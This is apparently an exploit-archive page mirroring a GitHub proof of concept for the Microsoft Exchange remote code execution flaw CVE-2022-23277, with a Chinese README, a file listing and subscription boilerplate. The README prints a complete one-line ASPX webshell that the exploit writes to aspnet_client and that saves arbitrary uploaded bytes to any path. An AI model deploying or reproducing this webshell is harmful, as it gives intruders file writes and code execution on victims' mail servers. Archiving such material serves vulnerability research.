Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-23277 PoC — Microsoft Exchange Server Remote Code Execution Vulnerability

Source
https://github.com/7BitsTeam/CVE-2022-23277
Associated Vulnerability
Title:Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2022-23277)
Description:Microsoft Exchange Server Remote Code Execution Vulnerability
Description
CVE-2022-23277 POC to write a webshell to aspnet_client
Readme
# exch_CVE-2021-42321

## 本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具

认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1.aspx。

webshell:

```
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
```

利用详情可以参照我们的文章

### 欢迎关注我们的公众号 - Zbits2022

![](/images/qrcode.jpg)
File Snapshot

 [4.0K]  /data/pocs/a4ff0f5a1104dda0de593d935399ceb0aaa95892
├── [9.7K]  cve-2022-23277.py
├── [4.0K]  images
│   └── [ 27K]  qrcode.jpg
├── [ 34K]  ObjectDataProviderGenerator.cs
└── [ 510]  README.md

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →